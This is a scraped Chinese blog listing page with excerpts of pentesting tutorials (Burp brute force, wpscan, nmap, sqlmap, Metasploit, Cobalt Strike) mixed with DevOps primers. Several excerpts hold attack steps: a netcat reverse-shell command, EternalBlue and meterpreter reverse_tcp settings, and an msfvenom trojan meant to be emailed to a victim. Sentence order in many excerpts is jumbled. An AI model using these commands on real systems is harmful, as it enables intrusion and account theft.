- 博客(46)
- 收藏
- 关注
原创 Burp Suite——账号、密码爆破
先burp上拦截登录请求,然后点击登录。选择需要爆破的系统,随便输入账号密码。登录之后返回burp查看拦截请求信息。开启代理(浏览器和burp需一致)
2024-03-09 22:16:14
1049
原创 渗透工具——kali中cewl简介
cewl是一个ruby应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到wpscan等密码爆破工具里进行密码破解。语法:cewl <url> [options] <保存于哪个目录>cewl工具爬取目标网站信息,生成相对应的字典。二、cewl的简单使用方法。将爬取到的内容在下行显示。
2024-02-24 21:44:52
1344
原创 渗透工具——kali中wpscan简介
4、WordPress是全球流行的博客网站,许多外国的博客都是用它搭建的,但是存在着很多漏洞,专注于这些漏洞与其特性,一个专门针对该CMS的WPScan工具出现了。3、WordPress是全球流行的博客网站,全球有上百万人使用它来搭建博客。wpscan --url [url] -U [用户名字典路径] -P [密码字典路径]服务器评估工具,我们认为这个工具应该成为所有针对。漏洞的黑盒子扫描器,它可以为所有。二、wpscan工具的简单使用。网站进行的渗透测试的一部分。一、什么是wpscan。
2024-02-24 21:44:36
1227
原创 linux反弹shell简单使用
nc -e /bin/bash [靶机ip] [靶机监听端口]反弹成功后需要将反弹shell升级为交互shell。nc -lvvp [任意未占用的端口号]一、反弹shell(NC正向反弹)2、攻击机将shell弹到靶机上。1、靶机开启监听端口。
2024-02-24 21:43:27
842
原创 docker-compose安装
Compose 通过一个配置文件来管理多个Docker容器,在配置文件中,所有的容器通过services来定义,然后使用docker-compose脚本来启动,停止和重启应用,和应用中的服务以及所有依赖服务的容器,适合组合使用多个容器进行开发的场景。一个使用Docker容器的应用,通常由多个容器组成。Docker Compose是一个用来定义和运行复杂应用的Docker工具。注:环境中需要有docker,若没有,请参考链接安装docker。二、安装docker-compose。
2024-01-27 21:03:47
472
原创 git各分支简介
如果修复期间,有其他版本合并入master ,需要同步到fixbug版本,并进行测试。由于当前版本迭代较快,开发分支只提供拉取,不进行实际开发。一般开发的新功能时,feature分支都是基于develop分支下创建的。所有用户可见的正式版本,都从master发布(也是用于部署生产环境的分支,确保master分支稳定性)master 分支一般由develop以及hotfix分支合并,任何时间都不能直接修改代码。release 为预上线分支,发布提测阶段,会release分支代码为基准提测。
2023-12-16 20:28:25
728
原创 使用dockerfile创建容器
CMD java -jar ds_web.jar #定义容器启动执行的命令 app.jar的名字可自取。docker run -id -p 主机端口号:容器端口号 --name=容器名字 镜像(ds_web)ADD *.jar ds_web.jar #将jar包添加到容器。FROM centos #定义镜像,不能有大写。五、最后,查看所有容器,查看正在运行的容器。一、将要创建容器的jar包上传至服务器中。三、使用dockerfile文件构建镜像。二、创建dockerfile文件。
2023-12-16 20:14:53
678
原创 CI/CD工具
持续交付是一系列的开发实践方法,用来确保让代码能够快速安全的部署到产品环境中,它通过将每一次改动都提交到一个模拟产品环境中,使用严格的自动化测试,确保业务应用和服务能符合预期。Travis CI是一个基于云的CI/CD服务,可以轻松地集成Github等平台。像其他CI/CD工具一样,Travis CI提供了一个可配置的工作流程,以便团队自定义它们的构建流程。持续部署是基于某种工具或平台实现代码自动化的构建、测试和部署到线上环境以实现交付高质量的产品,持续部署在某种程度上代表了一个开发团队的更新迭代速率。
2023-12-09 18:02:13
1659
原创 软件开发中的几个环境简介
可以理解为包含所有的功能的环境,任何项目所使用的环境都以这个为基础,然后根据客户的个性化需求来做调整或者修改。顾名思义是和真正使用的环境一样的环境(即已经出售给客户的系统所在环境,也成为商用环境),所有的配置,页面展示等都应该和商家正在使用的一样,差别只在环境的性能方面。开发环境是程序猿们专门用于开发的服务器,配置可以比较随意, 为了开发调试方便,一般打开全部错误报告。测试环境,外部用户无法访问,专门给测试人员使用的,版本相对稳定。开发环境,外部用户无法访问,开发人员使用,版本变动很大。
2023-12-09 17:43:16
776
原创 CVSS简介
是由FIRST(Forum of Incident Response and Security Teams)提出的漏洞严重性评分算法,现在已成为ITU-T(b-ITU-T X.1521)和NIST(NISTIR 7435)的推荐标准,被广泛应用于软件安全、漏洞管理等领域,受到eBay、(Symantec)、思科(Cisco)、甲古文(Oracle)等众多厂商支援。用于计算基准评分,主要从漏洞的内在特性(不会随时间的推移或环境的改变而变化),来评价漏洞的严重性。
2023-12-02 15:30:40
314
原创 逻辑漏洞简介
不固定型: 或者称作“十分有针对性”,因为每一种逻辑缺陷似乎都是唯一的,它是基于逻辑操作,不同的功能逻辑不同,因此无法用一般的工具发现他们。逻辑漏洞:又称业务逻辑漏洞,是指由于程序逻辑不严谨或者 逻辑太复杂,导致一些逻辑分支不能正常处理或 者处理错误。通俗的讲,一个系统功能太多后,程序开发人员难以顾及到方方面面,对于某些地方的处理可能有遗漏, 从而导致逻辑漏洞。普遍存在性: 由于功能的实现需要大量的逻辑操作,同时受制于程序员的背景,这类缺陷普遍存在于各类应用程序中。三、常见的逻辑漏洞类型。
2023-12-02 14:53:34
328
原创 dockerfile简介
Dockerfile是一个创建镜像所有命令的文本文件,包含了一条条指令和说明,每条指令构建一层, 通过docker build命令,根据Dockerfile的内容构建镜像,因此每一条指令的内容, 就是描述该层如何构建。有了Dockefile,就可以制定自己的docker镜像规则,只需要在Dockerfile上添加或者修改指令,就可生成docker 镜像。3、dockerfile由多条指令构成,Dockerfile中的每一条指令都会对应于Docker镜像中的每一层。二、dockerfile的核心作用。
2023-11-25 21:55:41
71
原创 CNVD和CNNVD
国家信息安全漏洞库(China National Vulnerability Database of Information Security):是中国信息安全测评中心(中文简称:国测,英文简称:CNITSEC,China Information Technology Security Evaluation Center)为切实履行 漏洞分析 和 风险评估 的职能,负责建设运维的国家信息安全漏洞库,面向国家、行业和公众提供灵活多样的信息安全数据服务,为我国信息安全保障提供基础服务。
2023-11-18 18:31:07
1408
原创 Confluence简介
->导出:页面乃至整个空间可以导出为 HTML,PDF,XML 文件;-->通知:通过 mail/RSS 来跟踪页面的内容变更;-->安全:高级的权限和安全性,权限控制非常合理、方便;-->定制:颜色,风格,整个站点的布局都可以定制;-->开放的 API 接口,灵活扩展和集成;-->搜索:跨页面,注释和附件间的搜索;-->组织:高效地创建灵活的页面结构;-->重获:容易找到你需要的信息;-->PDF 导出和自动的重构;-->简洁,友好的用户界面;-->强大的构造和搜索功能;-->重构:高效的信息操作;
2023-11-18 18:30:39
1160
原创 B/S架构和C/S架构
C/S——客户端/服务器结构(Client/Server),C/S结构在技术上很成熟,它的主要特点是交互性强、具有安全的存取模式、网络通信量低、响应速度快、利于处理大量数据。C/S结构的软件需要针对不同的操作系统系统开发不同版本的软件,加之产品的更新换代十分快,已经很难适应百台电脑以上局域网用户同时使用。B/S——浏览器/服务器结构(Browser/Server),是目前应用系统的发展方向,在这种结构下,通过浏览器来进入工作界面,极少部分事务逻辑在前端实现,主要事务逻辑在服务器端实现,形成三层结构。
2023-11-04 18:10:03
341
原创 基于容器的集群管理平台—k8s
k8s 本质上就是用来简化微服务的开发和部署的,关注点包括自愈和自动伸缩、调度和发布、调用链监控、配置管理、Metrics 监控、日志监控、弹性和容错、API 管理、服务安全等,k8s 将这些微服务的公共关注点以组件形式封装打包到 k8s 这个大平台中,让开发人员在开发微服务时专注于业务逻辑的实现,而不需要去特别关系微服务底层的这些公共关注点,大大简化了微服务应用的开发和部署,提高了开发效率。K8S用于容器化应用程序的部署,扩展和管理;4. 容器化的应用可以在不同的云服务商、不同的Linux系统进行部署。
2023-10-28 20:30:01
153
原创 Linux命令之umask
用户每次注册进入系统时,umask命令都被执行, 并自动设置掩码来限制新文件的权限。用户可以通过再次执行umask命令来改变默认值,新的权限将会把旧的覆盖掉。第四位的2,表示【其他用户权限】,从其他用户权限减2,取消其他用户的“写(w=2)”权限。作用:umask命令用来控制权限掩码,为新建的文件或目录设置一个。第三位的2,表示【用户组权限】,从组权限减2,减掉“写(w=2)”的权限.文件/目录创建时的初始权限 = 默认权限 - 权限掩码。第二位的0,表示【用户权限】,从用户权限减0,权限不变。
2023-10-21 22:19:28
1818
原创 #常见漏洞解析—CSRF简介
攻击者通过欺骗用户点击恶意链接或者访问恶意网站,在用户已经登录了目标网站的情况下,发送伪造的请求来执行攻击。如果在cookie存在期间,通过构造csrf脚本或包含csrf脚本的链接发送给用户,得到信息后,再伪造成用户身份,执行相关操作。攻击者利用网站对请求的验证漏洞而实现这样的攻击行为,网站能够确认请求来源于用户的浏览器,却不能验证请求是否源于用户的真实意愿下的操作行为。用户浏览器在网站A上执行相关操作(以已经持有的cookie)网站F收到用户请求后,返回恶意代码给用户,强制他访问网站A。
2023-09-30 14:52:52
115
原创 Linux文件识别类型
当文件没有后缀名或者有后缀名而无法正常打开时,根据识别出的文件类型来修改后缀名即可正常打开文件。和上面的文件头类型图对比,就可以分辨出文件类型了(注:对比十六进制开头的几个)通过winhex程序中可以查看文件头类型,根据文件头类型判断出文件类型。使用场景:Windows下通过文件头信息判断文件类型。然后按照查询出的格式修改文件格式就可以了。使用场景:不知道后缀名,无法打开文件。格式:file + 文件名。
2023-09-30 14:52:28
167
原创 AK/SK认证简介
具体来说,AK和SK用于对API请求进行签名以确保请求的完整性和身份验证。在访问受保护的服务或资源时,需要提供有效的AK和SK才能获得授权。AK和SK的作用是保证只有授权用户才能访问特定的服务或资源,同时也提供了对用户操作的跟踪和审计能力。云主机接收到用户的请求后,系统将使用AK对应的相同的SK和同样的认证机制生成认证字符串,并与用户请求中包含的认证字符串进行比对。SK:Secret Access Key,是用户用于加密认证字符串和用来验证认证字符串的密钥,其中SK必须保密。
2023-09-23 19:20:32
8376
原创 磁盘阵列RAID详解
简单地说, RAID 是由多个独立的高性能磁盘驱动器组成的磁盘子系统,从而提供比单个磁盘更高的存储性能和数据冗余的技术。RAID5是有数据校验的数据条带化技术,数据分布在阵列中的所有磁盘上,使用校验盘技术,按照块的方式来组织数据,校验数据分布在阵列中的所有磁盘上。应该是目前最常见的 RAID 等级,对于数据和校验数据,它的写操作可以同时发生在完全不同的磁盘上。2、高性能:RAID 的高性能受益于数据条带化技术。1、大容量:它扩大了磁盘的容量,由多个磁盘组成的 RAID 系统具有海量的存储空间。
2023-09-16 19:16:30
567
原创 #常见漏洞解析—XSS简介
3、DOM跨站(DOM XSS):DOM(document object model文档对象模型),客户端脚本处理逻辑导致的安全问题,客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。1、存储型XSS:(持久型跨站)最直接的危害类型,跨站代码存储在服务器(数据库)中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie。
2023-09-16 19:16:14
199
原创 Cookie、Session简介
一旦数据交换完毕,客户端与服务器端的连接就会关闭,再次交换数据需要建立新的连接,这就意味着服务器无法从连接上跟踪会话,所以就出现了Cookie,Cookie解决了HTTP协议无状态的不足。如果说Cookie机制是通过检查客户身上的“通行证”来确定客户身份的话,那么Session机制就是通过检查服务器上的“客户明细表”来确认客户身份,Session相当于程序在服务器上建立的一份客户档案,客户来访的时候只需要查询客户档案表就可以了。(1)会话状态管理(如用户登录状态、购物车、游戏分数或其它需要记录的信息)
2023-09-16 19:15:49
54
原创 MD5的使用
1、MD5可用于一致性验证。比如:在某些软件下载站点的某软件信息中看到其MD5值,它的作用就在于我们能够在下载该软件后,对下载回来的文件用专门的软件做一次MD5校验,以确保咱们得到的文件与该站点提供的文件为同一文件。4、强抗碰撞:已知原数据和其MD5值,想找到一个具有相同MD5值的数据(即伪造数据)是非常困难的。3、抗修改性:对原数据进行任何改动,哪怕只修改1个字节,所得到的MD5值都有很大区别。1、压缩性:任意长度的数据,算出的MD5值长度都是固定的。2、容易计算:从原数据计算出MD5值很容易。
2023-09-09 19:42:23
1292
原创 渗透工具——cs(Cobalt Strike)简介
CS 是Cobalt Strike的简称,是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。3、Cobalt Strike可以引用其他的通讯框架ExternalC2,ExternalC2是由Cobalt Strike提出的一套规范/框架,它允许黑客根据需要对框架提供的默认HTTP(S)/DNS/SMB C2 通信通道进行扩展。Desktop(VNC) #桌面交互。
2023-09-09 19:41:43
4525
原创 suse Java环境变量安装配置
一、在/sur/local/目录下创建一个目录java。二、将下载好的安装包放进这个目录内并解压。编辑/etc/profile文件。五、最后,验证安装是否成功。
2023-09-02 10:47:16
559
原创 渗透工具——kali中nmap简介
当然啦,nmap的使用方法还有很多,就不一一为大家举例啦,想要更深入了解的朋友可以在kali中实践,使用“nmap -help”就可以查看更多使用说明啦~~~有防火墙等拦截返回的STATE时,可以使用“nmap -Pn -sT -v -p [端口号] [IP]”-T4:快速扫描中一种,0-5个等级,等级越高,,扫描速度越快。-T4:快速扫描中一种,0-5个等级,等级越高,,扫描速度越快。nmap --script=vuln IP地址。nmap -sS -sV -T4 IP地址。nmap -Pn 目标IP。
2023-09-02 10:46:56
526
原创 渗透工具——kali中SQLMap简介
首先,SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现、利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库有MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB。3. 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;4. 联合查询注入,可以使用union的情况下的注入;
2023-09-02 10:46:39
945
原创 渗透工具——kali中msf简介(以及MSF的基本使用方法)
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
2023-09-02 10:45:52
9082
2
原创 渗透工具——kali中msf(后门生成模块msfvenom)
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
2023-09-02 10:44:01
929
原创 离线安装docker
systemctl daemon-reload:重启以".service"为后缀的文件。文件目录为:/etc/systemd/system/docker.service。systemctl enable docker.service:开机自启动。systemctl start docker:启动docker。三、将解压的文件全都转移到/usr/bin目录下。四、创建并编辑docker.service文件。/usr/bin是存放标准安装程序的路径之一。一、下载docker安装包。五、启动docker。
2023-08-26 18:19:12
121
原创 远程连接失败排查思路
2.若网络连通,但让不能远程,则检查防火墙是否未关闭(可以用“telnet IP 端口号”检验)win+R打开cmd,ping虚拟机IP地址(在虚拟机上ping baidu.com效果一样)如果网络不同,则检查是否是虚拟机与本机连接方式有问题(建议使用桥接模式)若显示“running”则表示防火墙开启。若显示“dead”则表示防火墙已经关闭。1.查看网络是否连通。
2023-08-26 18:18:53
162
原创 在虚拟机中增加suse硬盘后,找不到增加的空间?
分区数量没有增加,因为新扩展在一个硬盘上,所有新扩展的空间也在sda硬盘中,通过fdisk进行创建分区。一、首先,将要扩容的suse关机,选择编辑虚拟机设置,硬盘,在实用工具那里选择“扩展”m ~n ~p 后面输入分区号码,后面采用默认值就可以了。重新fdisk -l查看就可以看见/dev/sda3了。二、启动操作系统查看磁盘情况。查看命令:fdisk -l。
2023-08-26 18:18:06
655
原创 &Web安全—(四)HTML超文本标记语言
HTML(Hyper Text Markup Language):超文本标记语言,简单来说,网页就是用HTML语言制作的;HTML不是一种编程语言,它是一种标记语言;标记语言是一套标记标签(markup tag);HTML使用标记标签来描述网页;HTML文档包含了HTML标签及文本内容;HTML文档也叫做web页面。
2023-08-19 18:52:23
68
原创 什么是分布式系统
分布式系统是由一组通过网络进行通信、为了完成共同的任务而协调工作的计算机节点组成的系统。分布式系统的出现是为了用廉价的、普通的机器完成单个计算机无法完成的计算、存储任务。其目的是利用更多的机器,处理更多的数据。并发性:程序运行过程中,并发性操作是很常见的。比如同一个分布式系统中的多个节点,同时访问一个共享资源;无序性:进程之间的消息通信,会出现顺序不一致问题。分布性:服务部署空间具有多样性;
2023-08-19 18:27:53
192
原创 Linux文件系统中常见的四种类型
ext2是最早的Linux文件系统之一,它使用了一种称为“二级索引”的技术来管理文件。它的缺点是不能自动恢复文件系统中的错误。ext3是ext2的改进版本,它增加了日志功能,可以自动恢复文件系统中的错误。它是Linux中最常用的文件系统之一。ext4是ext3的升级版本,它支持更大的文件和更快的文件系统检查。它还增加了一些新的特性,如延迟分配和多块分配。xfs是一种高性能的文件系统,它支持大文件和高吞吐量。它是一种日志文件系统,可以自动。恢复文件系统中的错误。它在大型服务器和高性能计算机上广泛使用。
2023-08-12 22:31:40
533
1
原创 Linux安装docker(contos系统)
2.开机自动启动docker:systemctl enable docker。3.查看防火墙状态:systemctl status firewalld。1.启动docker:systemctl start docker。1.关闭防火墙:systemctl stop firewalld。八、关闭防火墙(docker启动前要关闭防火墙)七、查看安装完成的docker的版本号。二、卸载旧版本docker。四、更新yum源,repo。三、安装需要的软件包。六、安装docker。九、启动docker。
2023-08-08 11:21:29
159
原创 Linux进入docker命令
docker exec -it (所需要进入的容器的ID) /bin/bash。docker ps,找到所需要运行的容器。
2023-08-05 15:18:12
916
1
原创 Web安全—(三)JSONP跨域解决方案
因为JSON的纯字符数据格式可以简洁的描述复杂数据,且JSON还被JS原生支持,所以在客户端几乎可以随心所欲的处理这种格式的数据;JOSNP协议的一个要点就是允许用户传递一个callbank(回调函数)参数给服务端,然后服务端返回数据时会将这个callbank参数作为函数名包裹在JSON数据,这样客户端就可以随意定制自己的函数来自动处理返回数据了。它是一种约定,是浏览器最核心也是最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能都会受到影响)兼容性比较好,可以用于解决浏览器的跨域数据访问的问题;
2023-08-01 16:21:05
219
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人